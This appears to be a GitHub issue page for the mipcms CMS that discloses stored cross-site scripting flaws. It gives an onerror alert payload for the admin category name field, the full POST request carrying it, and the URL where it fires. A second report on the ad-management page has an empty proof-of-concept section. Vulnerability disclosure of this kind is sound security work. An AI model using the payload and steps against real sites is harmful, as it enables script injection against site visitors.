sansanyun / mipcms Goto Github PK

1.After the administrator logged in, open the following page:

http://127.0.0.1/?s=/admin/article/articleCategory/

2.click 'modify'
3.fill payload in Category Name :

"><imG/src=1 onerror=alert(1)>

4.save
5.The request package :

POST /?s=/article/ApiAdminArticle/categoryEdit HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Referer: http://127.0.0.1/?s=/admin/article/articleCategory/
Content-Type: application/json;charset=utf-8
access-key: cFaLOmUGoz9URROtxaAqe37vHSlI0LL3
terminal: pc
uid: 9afb4393b6cddbeb7418ab77
access-token: 06cdb3c844508158ebb7483c221c9e63
Content-Length: 324
Cookie: security_level=0; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1549460630; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1553359007; lang_type=zh-CN; bdshare_firstime=1549546719595; wp-settings-time-1=1551345212; PHPSESSID=65unerfghovped0ap7eokcrdi3; admin_id=1; admin_level=1; admin_name=admin; admin_secret=8b99f316efb80526f2434ded92036bff; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1553359007
DNT: 1
Connection: close

{"id":1,"pid":0,"name":""><imG/src=1 onerror=alert(1)>","url_name":"123","seo_title":"","template":"article.html","detail_template":"articleDetail.html","category_url":"/article/<url_name>/","category_page_url":"<category_url>index_.html","detail_url":"/article/.html","description":"","keywords":"","content":""}


6.open the url it will trigger:

http://127.0.0.1/index.php?s=/article/123/


When an intruder enters the backstage of a website, xss playlod can be added to the website ad management, which will trigger an attack when the user visits the website.
Vulnerability url:
http://127.0.0.1/mipcms/?s=/admin/addons/ad/AdminAd/adList

Vulnerability POC:

安装的时候请求无效。正确填写了，环境都没问题